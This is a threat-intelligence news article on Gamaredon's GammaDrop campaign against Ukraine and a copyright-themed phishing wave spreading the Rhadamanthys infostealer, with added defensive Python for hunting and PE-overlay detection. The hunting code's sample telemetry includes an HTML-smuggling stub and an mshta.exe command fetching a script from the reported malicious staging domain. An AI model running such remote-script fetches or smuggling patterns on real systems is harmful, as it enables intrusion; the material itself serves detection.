Hackers Exploit Cloudflare Tunnels and DNS Fast-Flux to Conceal GammaDrop Malware

 A notorious threat actor known as Gamaredon has been observed employing Cloudflare Tunnels to hide its malware staging infrastructure, facilitating the deployment of GammaDrop malware. This technique is part of a spear-phishing campaign actively targeting Ukrainian organizations since early 2024. 

Campaign Details and Tactics 

According to Recorded Future's Insikt Group, the primary goal of this campaign is to deliver Visual Basic Script malware. The group, monitored under the alias BlueAlpha, has also been identified by several other names, including:

  • Aqua Blizzard
  • Armageddon
  • Hive0051
  • Iron Tilden
  • Primitive Bear
  • Shuckworm
  • Trident Ursa
  • UAC-0010
  • UNC530
  • Winterflounder
Active since 2014, BlueAlpha is linked to Russia's Federal Security Service (FSB). "BlueAlpha has recently started using Cloudflare Tunnels to obscure staging infrastructure for GammaDrop, a tactic gaining traction among cybercriminal groups," noted Insikt Group. Additionally, the group continues to use DNS fast-fluxing to complicate the tracking and disruption of command-and-control (C2) communications. 
 
Recent Observations 

The use of Cloudflare Tunnels by Gamaredon was first reported in September 2024 by ESET, a Slovak cybersecurity firm, during attacks targeting Ukraine and NATO countries, including Bulgaria, Latvia, Lithuania, and Poland. ESET described BlueAlpha's methods as "reckless and not particularly stealth-focused," although the group employs measures to evade detection and maintain access to compromised systems. These include deploying multiple simple downloaders or backdoors and frequently updating their malware tools with regularly changing obfuscation techniques. 
 
Malware Deployment Process 

The phishing campaign uses HTML attachments to initiate infections via HTML smuggling: the payload travels inside the attachment itself, and JavaScript running in the recipient's browser decodes it and saves it to disk, so nothing is fetched from the network at delivery time and mail-gateway URL filtering never sees a download. Key steps include:
  • Phishing emails with HTML attachments drop a 7-Zip archive ("56-27-11875.rar") containing a malicious LNK file.
  • The LNK file launches mshta.exe, a signed Windows binary commonly abused as a living-off-the-land tool, to run the script that delivers GammaDrop.
  • GammaDrop deploys a custom loader, GammaLoad, which connects to a C2 server to retrieve additional malware.
The GammaDrop stage is hosted on a server behind a Cloudflare Tunnel, with the domain amsterdam-sheet-veteran-aka.trycloudflare[.]com (defanged) serving as the staging point; trycloudflare hostnames belong to the free, no-account tier of the tunnel service, so the name carries no registration data and the origin server is never exposed. GammaLoad resolves its C2 infrastructure through DNS-over-HTTPS (DoH) services such as Google's and Cloudflare's, which takes the lookups away from the organization's own resolver, and falls back to fast-flux DNS when those fail.
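The chain above, turned into per-stage hunting checks. This is an added example and not code from Recorded Future, ESET or the malware itself; the HTML, process event, DNS queries and resolver answers are constructed for the example, the alert labels and the fast-flux thresholds (five distinct IPs, TTL at or under 300 s) are assumptions, the staging domain is the one named in the report, and the path on it is a placeholder.

```python
"""
Hunting checks for each stage of the GammaDrop chain:
HTML smuggling attachment -> archive -> LNK -> mshta.exe -> staging host on a
Cloudflare Tunnel -> C2 resolved over DoH, fast-flux DNS as fallback.
All telemetry below is constructed for this example; the process-event field
names follow Sysmon-style process creation events.
"""
from __future__ import annotations
import re
from collections import defaultdict

# Stage 1: HTML smuggling. The browser decodes an embedded blob and forces a
# download; each API is benign on its own, so count how many stages co-occur.
SMUGGLING_MARKERS = {
    "decode": re.compile(r"\batob\s*\(|Uint8Array", re.I),
    "blob": re.compile(r"new\s+Blob\s*\(|createObjectURL\s*\(|msSaveOrOpenBlob", re.I),
    "save": re.compile(r"\.download\s*=|\bdownload\s*=\s*[\"']|\.click\s*\(", re.I),
}

def html_smuggling_score(html: str) -> int:
    """0..3: number of smuggling stages present; 3 = decode + blob + forced save."""
    return sum(1 for rx in SMUGGLING_MARKERS.values() if rx.search(html))

# Stage 2: LNK -> mshta.exe. mshta.exe started with a URL on its command line
# is the 'pull a remote HTA' pattern; parent explorer.exe fits a double-clicked LNK.
REMOTE_URL = re.compile(r"https?://\S+", re.I)

def mshta_alerts(evt: dict) -> list[str]:
    alerts = []
    if evt["image"].lower().endswith("\\mshta.exe"):
        if REMOTE_URL.search(evt["cmdline"]):
            alerts.append("mshta_remote_script")
        if evt.get("parent_image", "").lower().endswith("\\explorer.exe"):
            alerts.append("mshta_from_explorer")
    return alerts

# Stages 3-4: quick-tunnel staging hosts and public DoH resolvers. Contacting a
# DoH resolver bypasses the enterprise resolver, so it is only a signal where
# DoH is not sanctioned by policy.
TRYCLOUDFLARE = re.compile(r"(^|\.)trycloudflare\.com$", re.I)
DOH_RESOLVERS = {"dns.google", "cloudflare-dns.com", "mozilla.cloudflare-dns.com"}

def dns_alerts(qname: str) -> list[str]:
    q = qname.rstrip(".").lower()
    alerts = []
    if TRYCLOUDFLARE.search(q):
        alerts.append("trycloudflare_staging")
    if q in DOH_RESOLVERS:
        alerts.append("doh_resolver_contact")
    return alerts

# Stage 5: fast-flux fallback. Many distinct A records with short TTLs for one
# name inside a short observation window is the fast-flux signature.
def fast_flux_domains(records, min_ips: int = 5, max_ttl: int = 300) -> list[str]:
    """records: iterable of (qname, answer_ip, ttl); thresholds are assumptions."""
    ips, ttls = defaultdict(set), defaultdict(list)
    for name, ip, ttl in records:
        ips[name].add(ip)
        ttls[name].append(ttl)
    return sorted(n for n in ips if len(ips[n]) >= min_ips and max(ttls[n]) <= max_ttl)

# ---- constructed sample telemetry ---------------------------------------------
SAMPLE_HTML = """<script>
var raw = atob("UmFyIRoHAQA");               // constructed stub, not a payload
var buf = new Uint8Array(raw.length);
var a = document.createElement("a");
a.href = URL.createObjectURL(new Blob([buf]));
a.download = "56-27-11875.rar"; a.click();
</script>"""

SAMPLE_PROCESS = {   # <path> is a placeholder; the real path is not published here
    "image": r"C:\Windows\System32\mshta.exe",
    "cmdline": "mshta.exe https://amsterdam-sheet-veteran-aka.trycloudflare.com/<path>",
    "parent_image": r"C:\Windows\explorer.exe",
}

SAMPLE_QUERIES = ["amsterdam-sheet-veteran-aka.trycloudflare.com", "dns.google", "example.com"]

# Six answers for one name at TTL 60 (fluxed) next to a normal long-TTL record.
FLUX_RECORDS = [("c2.example.net", f"198.51.100.{i}", 60) for i in range(1, 7)] + [
    ("www.example.org", "203.0.113.10", 86400),
]

def run_hunt() -> dict:
    return {
        "html_score": html_smuggling_score(SAMPLE_HTML),
        "process": mshta_alerts(SAMPLE_PROCESS),
        "dns": {q: dns_alerts(q) for q in SAMPLE_QUERIES},
        "fast_flux": fast_flux_domains(FLUX_RECORDS),
    }

if __name__ == "__main__":
    print(run_hunt())
```

Each check is weak alone (legitimate developers use quick tunnels, browsers use DoH, installers use mshta.exe); the value is in correlating them on one host within a short window, which is what the staged layout of the chain above invites.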
 
Implications and Future Threats 

Recorded Future warns that BlueAlpha is likely to continue refining its evasion techniques by exploiting legitimate services like Cloudflare. This approach complicates detection for traditional security systems. The group's enhancements to HTML smuggling and DNS-based persistence highlight evolving challenges for organizations with limited threat detection capabilities. "Organizations must strengthen their defenses against phishing campaigns and adopt advanced threat detection strategies to mitigate risks posed by actors like BlueAlpha," the report concluded.

Global Companies Targeted by "CopyR(ight)hadamantys" Phishing Scam Using Advanced Infostealer Malware

Hundreds of organizations worldwide have recently fallen victim to a sophisticated spear-phishing campaign, where emails falsely claiming copyright infringement are used to deliver an advanced infostealer malware.

Since July, Check Point Research has tracked the distribution of these emails across regions like the Americas, Europe, and Southeast Asia. Each email originates from a unique domain, and hundreds of Check Point’s clients have been targeted, suggesting the campaign's scope may be even broader.

The emails are designed to provoke recipients into downloading Rhadamanthys, a powerful infostealer capable of extracting sensitive data, such as cryptocurrency wallet information. Check Point researchers refer to the campaign as "CopyR(ight)hadamantys" and note the use of automated tools to send emails from different addresses. This automation can lead to awkward results, such as emails written in incorrect languages, limiting the emails’ ability to impersonate recognizable brands effectively. Roughly 70% of impersonated companies belong to the tech or media and entertainment sectors, including Check Point itself.

The phishing emails claim that the recipient has violated copyright laws by posting unauthorized content online. According to Sergey Shykevich, threat intelligence manager at Check Point, these accusations often cause recipients to question if they mistakenly used copyrighted material, increasing the chance they'll download the malware.

Recipients are directed to download a password-protected archive hosted on Dropbox or Discord. The archive holds a decoy document, a legitimate program, and a malicious DLL that the legitimate program loads (DLL side-loading) to install Rhadamanthys. Rhadamanthys stands out as one of the most sophisticated information-stealing tools sold on the dark web, priced around $1,000, significantly higher than other infostealers, which typically range from $100 to $200. Rhadamanthys is known for its modularity, obfuscation, and stealth, making detection much more challenging.

One notable feature of Rhadamanthys is its machine-learning-based OCR (optical character recognition) component. While limited in capability—it struggles with complex fonts and handwriting—this feature allows it to extract information from images and PDF files. The OCR module in the current campaign contains a dictionary of words tied to Bitcoin wallet security, suggesting a focus on cryptocurrency theft.

The CopyR(ight)hadamantys campaign aligns with financially motivated tactics, but Rhadamanthys has also been linked to state-sponsored actors, including Iran’s Void Manticore and the pro-Palestinian Handala group. Organizations are advised to enhance phishing defenses, though this campaign has an additional, unusual feature.

Once deployed, the malicious DLL writes a much larger copy of itself to the user's Documents folder, disguised as a Firefox component. The copy is functionally identical: the extra bytes are an "overlay" appended after the end of the PE image, which the Windows loader never maps. The padding serves two purposes: it changes the file's hash, so a hash-based blocklist for the small variant misses the large one, and it can push the file past the size limit above which some antivirus products skip scanning altogether.

According to Shykevich, organizations should monitor unusually large files downloaded via email, though legitimate files may also be large. He believes implementing effective download rules could help combat this tactic.
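A concrete form of the download rule suggested above. This is an added example, not Check Point's tooling or anything from the campaign: it parses the PE section table to find where the mapped image ends, measures whatever follows as overlay, and shows that a hash over the image alone stays stable across padding variants while the whole-file hash does not. The minimal PE, the two padded variants, and the thresholds in `padded_verdict` are constructed assumptions for the example.

```python
"""
Measure the PE overlay that a padded loader relies on. A PE file ends where its
last section's raw data ends (or at the headers if no section has raw data);
anything after that point is overlay. The sample PE and padding are constructed.
"""
import hashlib
import struct

COFF_HDR_LEN = 20
SECTION_HDR_LEN = 40


def pe_image_end(data: bytes) -> int:
    """Offset just past the last byte the PE loader would map from disk."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    sect_table = e_lfanew + 4 + COFF_HDR_LEN + opt_size
    end = sect_table + num_sections * SECTION_HDR_LEN      # at least the headers
    for i in range(num_sections):
        hdr = sect_table + i * SECTION_HDR_LEN
        size_raw, ptr_raw = struct.unpack_from("<II", data, hdr + 16)
        if size_raw:                                      # .bss-style sections have no raw data
            end = max(end, ptr_raw + size_raw)
    return end


def overlay_size(data: bytes) -> int:
    """Bytes after the image end; 0 for a truncated file rather than negative."""
    return max(0, len(data) - pe_image_end(data))


def image_hash(data: bytes) -> str:
    """SHA-256 over the mapped image only; unaffected by overlay padding."""
    return hashlib.sha256(data[:pe_image_end(data)]).hexdigest()


def padded_verdict(data: bytes, min_overlay=4 * 1024 * 1024, min_ratio=0.9) -> bool:
    """Flag when the overlay is large in absolute terms and dominates the file.
    Both thresholds are assumptions for this example, not published values."""
    ov = overlay_size(data)
    return ov >= min_overlay and ov / len(data) >= min_ratio


def build_minimal_pe(code: bytes = b"\xC3" * 0x200) -> bytes:
    """Constructed one-section PE32+ skeleton: just enough header to be parsed."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))           # e_lfanew
    opt_size = 0xF0
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, opt_size, 0x0022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)                 # PE32+ magic
    sect = struct.pack("<8sIIIIIIHHI", b".text\0\0\0", len(code), 0x1000,
                       len(code), 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect).ljust(0x200, b"\0")
    return headers + code


CLEAN_PE = build_minimal_pe()
# Two overlay variants of the same image: same code, different size and hash.
PADDED_A = CLEAN_PE + bytes(range(256)) * (5 * 1024 * 1024 // 256)
PADDED_B = CLEAN_PE + b"\x00" * (6 * 1024 * 1024)


def demo() -> dict:
    return {
        "clean_overlay": overlay_size(CLEAN_PE),
        "padded_overlay": overlay_size(PADDED_A),
        "whole_file_hashes_differ": hashlib.sha256(PADDED_A).hexdigest()
                                    != hashlib.sha256(PADDED_B).hexdigest(),
        "image_hashes_match": image_hash(CLEAN_PE) == image_hash(PADDED_A) == image_hash(PADDED_B),
        "flag_clean": padded_verdict(CLEAN_PE),
        "flag_padded": padded_verdict(PADDED_A),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Raw file size alone is the weak signal Shykevich cautions about; the overlay ratio is the sharper one, since legitimate large executables carry their bulk inside mapped sections, and the overlay-stripped hash lets a blocklist match every padding variant of one loader.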